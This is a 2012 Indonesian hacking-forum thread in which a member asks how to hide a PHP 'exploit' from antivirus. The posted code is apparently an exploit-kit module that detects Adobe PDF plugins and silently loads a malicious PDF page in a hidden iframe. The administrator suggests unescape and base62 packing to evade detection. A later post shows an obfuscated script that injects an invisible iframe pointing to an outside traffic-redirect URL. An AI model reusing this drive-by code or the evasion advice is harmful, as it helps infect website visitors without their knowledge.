Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 06-19-2013, 04:23 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Programming › PHP v
« Previous 1 ... 19 20 21 22 23 ... 32 Next »

[Ask] Encrypt php - Undetected

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
Ask Encrypt php - Undetected
02-28-2012, 03:54 AM
Post: #1
A25414N Offline
./Devilz Officer
Posts: 60
Joined: Jun 2011
Reputation: 3
Encrypt php - Undetected
numpang nanya bro,, ada cara lain ga buat enkrip php (exploit) biar ga ketect antivirus.. misal scriptnya seperti ini :

Code:
<?php

$expname = "pdf";
$exploits[] = "
function pdf(){
    var isInstalled = false;
    if (navigator.plugins && navigator.plugins.length){
        for (var x = 0; x < navigator.plugins.length; x++){
            if (navigator.plugins[x].description.indexOf('Adobe Acrobat')!= -1){
                isInstalled = true;
                break;
            }
            if (navigator.plugins[x].description.indexOf('Adobe PDF')!= -1){
                isInstalled = true;
                break;
            }
        }
    } else if (window.ActiveXObject){
        var control = null;
        try {
            control = new ActiveXObject('AcroPDF.PDF');
        } catch (e) {}
        if (!control){
            try {
                control = new ActiveXObject('PDF.PdfCtrl');
            } catch (e) {}
        }
        if (control){
            isInstalled = true;
        }
    }
    if (isInstalled){
        var ua = navigator.userAgent.toLowerCase();
        if (ua.indexOf(\"firefox\") != -1){
            var pdfelement = document.createElement('embed');
            document.body.appendChild(pdfelement);
            pdfelement.width = '1';
            pdfelement.height = '1';
            pdfelement.src = './pdf.php';
            pdfelement.type = 'application/pdf';
        } else {
            var pdfelement = document.createElement('iframe');
            pdfelement.setAttribute('src', './pdf.php');
            pdfelement.setAttribute('width', 200);
            pdfelement.setAttribute('height', 200);
            pdfelement.setAttribute('style', 'display:none;');
            document.body.appendChild(pdfelement);
        }
        setTimeout(\"" . ($config['AjaxCheckBeforeExploit'] ? "if (CheckIP()){ Complete(); } else { %NextExploit% }" : "%NextExploit%") . "\", 2000);
    } else {
        %NextExploit%
    }
}
";


?>

Mohon pencerahannya..

makasih
Find all posts by this user
Quote this message in a reply
02-28-2012, 07:43 AM
Post: #2
imnoob Offline
./Devilz 1st Cadet
Posts: 20
Joined: Feb 2012
Reputation: 3
RE: Encrypt php - Undetected
ada brooo..
Find all posts by this user
Quote this message in a reply
02-28-2012, 07:46 AM
Post: #3
ditatompel Offline
Administrator
*******
Administrators
Posts: 2,205
Joined: Dec 2010
Reputation: 371
RE: Encrypt php - Undetected
(02-28-2012 03:54 AM)A25414N Wrote:  numpang nanya bro,, ada cara lain ga buat enkrip php (exploit) biar ga ketect antivirus.. misal scriptnya seperti ini :

Code:
<?php

$expname = "pdf";
$exploits[] = "
function pdf(){
    var isInstalled = false;
    if (navigator.plugins && navigator.plugins.length){
        for (var x = 0; x < navigator.plugins.length; x++){
            if (navigator.plugins[x].description.indexOf('Adobe Acrobat')!= -1){
                isInstalled = true;
                break;
            }
            if (navigator.plugins[x].description.indexOf('Adobe PDF')!= -1){
                isInstalled = true;
                break;
            }
        }
    } else if (window.ActiveXObject){
        var control = null;
        try {
            control = new ActiveXObject('AcroPDF.PDF');
        } catch (e) {}
        if (!control){
            try {
                control = new ActiveXObject('PDF.PdfCtrl');
            } catch (e) {}
        }
        if (control){
            isInstalled = true;
        }
    }
    if (isInstalled){
        var ua = navigator.userAgent.toLowerCase();
        if (ua.indexOf(\"firefox\") != -1){
            var pdfelement = document.createElement('embed');
            document.body.appendChild(pdfelement);
            pdfelement.width = '1';
            pdfelement.height = '1';
            pdfelement.src = './pdf.php';
            pdfelement.type = 'application/pdf';
        } else {
            var pdfelement = document.createElement('iframe');
            pdfelement.setAttribute('src', './pdf.php');
            pdfelement.setAttribute('width', 200);
            pdfelement.setAttribute('height', 200);
            pdfelement.setAttribute('style', 'display:none;');
            document.body.appendChild(pdfelement);
        }
        setTimeout(\"" . ($config['AjaxCheckBeforeExploit'] ? "if (CheckIP()){ Complete(); } else { %NextExploit% }" : "%NextExploit%") . "\", 2000);
    } else {
        %NextExploit%
    }
}
";


?>

Mohon pencerahannya..

makasih

Wew.. itu exploit sebenernya javascript ya om? Klo javascript mo dienkrip gimana pun tetep aja masuknya clientside.. CMIIW piss
Tapi coba aja om jsnya pake unescape / di ppack pake base62 packer
Find all posts by this user
Quote this message in a reply
02-28-2012, 03:05 PM
Post: #4
A25414N Offline
./Devilz Officer
Posts: 60
Joined: Jun 2011
Reputation: 3
RE: Encrypt php - Undetected
(02-28-2012 07:46 AM)ditatompel Wrote:  Wew.. itu exploit sebenernya javascript ya om? Klo javascript mo dienkrip gimana pun tetep aja masuknya clientside.. CMIIW piss
Tapi coba aja om jsnya pake unescape / di ppack pake base62 packer

outputnya yg seperti ini bukan :

Code:
<script>document.write(unescape('%3C')+unescape('% 69%66%72')+unescape('%61%6D%65')+unescape('%20')+u nescape('%73%72')+unescape('%63')+unescape('%3D%22 %68')+unescape('%74%74%70')+unescape('%3A%2F%2F')+ unescape('%63%63%63%70')+unescape('%2E')+unescape( '%75%73%2E%6C')+unescape('%61%69')+unescape('%66') +unescape('%75')+unescape('%65')+unescape('%72%2E' )+unescape('%63%6E%2F%74')+unescape('%72')+unescap e('%61%66%66%2F')+unescape('%67%6F')+unescape('%2E %70%68')+unescape('%70')+unescape('%3F')+unescape( '%73%69')+unescape('%64%3D')+unescape('%32%22%20%7 7')+unescape('%69%64%74')+unescape('%68%3D')+unesc ape('%22%30')+unescape('%22%20%68')+unescape('%65% 69%67')+unescape('%68%74%3D%22')+unescape('%30')+u nescape('%22')+unescape('%20')+unescape('%66%72%61 ')+unescape('%6D%65')+unescape('%62%6F%72%64')+une scape('%65')+unescape('%72')+unescape('%3D%22%30%2 2')+unescape('%3E%3C')+unescape('%2F%69')+unescape ('%66%72%61%6D%65%3E')+'');</script>

pasrah
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Information Cara encrypt link ? satpam 4 217 11-15-2012 10:39 PM
Last Post: satpam
  [Solved] Word Encrypt & Decrpyt bakul666 5 337 05-03-2012 09:32 AM
Last Post: suicidal

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 06-19-2013, 04:23 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE